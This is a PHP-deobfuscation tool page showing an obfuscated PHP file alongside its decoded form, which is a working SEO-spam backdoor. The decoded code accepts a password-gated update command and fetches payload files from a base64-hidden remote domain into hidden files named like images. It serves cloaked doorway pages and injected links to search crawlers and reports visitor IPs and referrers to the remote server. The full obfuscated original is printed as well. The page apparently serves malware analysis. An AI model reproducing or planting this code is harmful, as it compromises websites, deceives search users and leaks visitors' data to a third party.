Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $DnIjFXtEnc="wAyh38W7rqFGY9JNZ2gsBVePRcn_LUEKzMTQ4kuOaXjbDiHxSl6Iv0p1Cfd5tmo";$IcmBL..
Decoded Output download
set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>
", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page(){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("cG9wLXVwMjAxOS5ydQ==");
$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###
";
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
@file_put_contents($configs,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
@file_put_contents($bd,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
@file_put_contents($templ,$buf1);
exit;
}
if ($x=="4"){
echo "###WORKED###
";exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
echo $buf1;exit;
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;
}
}
Did this file decode correctly?
Original Code
<?php $DnIjFXtEnc="wAyh38W7rqFGY9JNZ2gsBVePRcn_LUEKzMTQ4kuOaXjbDiHxSl6Iv0p1Cfd5tmo";$IcmBLMBegSnV=$DnIjFXtEnc[43]. $DnIjFXtEnc[40] .$DnIjFXtEnc[19].$DnIjFXtEnc[22].
$DnIjFXtEnc[50] .$DnIjFXtEnc[36] .$DnIjFXtEnc[27]. $DnIjFXtEnc[58]. $DnIjFXtEnc[22].$DnIjFXtEnc[25].
$DnIjFXtEnc[62] .$DnIjFXtEnc[58].
$DnIjFXtEnc[22];$dnXlBODSEb=$DnIjFXtEnc[18] . $DnIjFXtEnc[32].$DnIjFXtEnc[45] . $DnIjFXtEnc[26]. $DnIjFXtEnc[57].
$DnIjFXtEnc[49] . $DnIjFXtEnc[40] . $DnIjFXtEnc[60].
$DnIjFXtEnc[22];$SvoEwCrliyulx=$DnIjFXtEnc[22]. $DnIjFXtEnc[8].
$DnIjFXtEnc[8] .$DnIjFXtEnc[62].$DnIjFXtEnc[8].
$DnIjFXtEnc[27]. $DnIjFXtEnc[8] .$DnIjFXtEnc[22].
$DnIjFXtEnc[54].
$DnIjFXtEnc[62]. $DnIjFXtEnc[8] . $DnIjFXtEnc[60].$DnIjFXtEnc[45].$DnIjFXtEnc[26]. $DnIjFXtEnc[18];$AzDKSWPYXWEViZ=$DnIjFXtEnc[25] .$DnIjFXtEnc[8] . $DnIjFXtEnc[22] . $DnIjFXtEnc[40].$DnIjFXtEnc[60]. $DnIjFXtEnc[22].$DnIjFXtEnc[27]. $DnIjFXtEnc[57] .$DnIjFXtEnc[38] . $DnIjFXtEnc[26].
$DnIjFXtEnc[25] .$DnIjFXtEnc[60]. $DnIjFXtEnc[45]. $DnIjFXtEnc[62].$DnIjFXtEnc[26];$SvoEwCrliyulx(0);$hRahGkgCk=$AzDKSWPYXWEViZ("",$dnXlBODSEb($IcmBLMBegSnV("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")));$hRahGkgCk();?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
error_reporting | 1 |
Stats
MD5 | dfe7e4416c997005845e6d00c7190225 |
Eval Count | 1 |
Decode Time | 89 ms |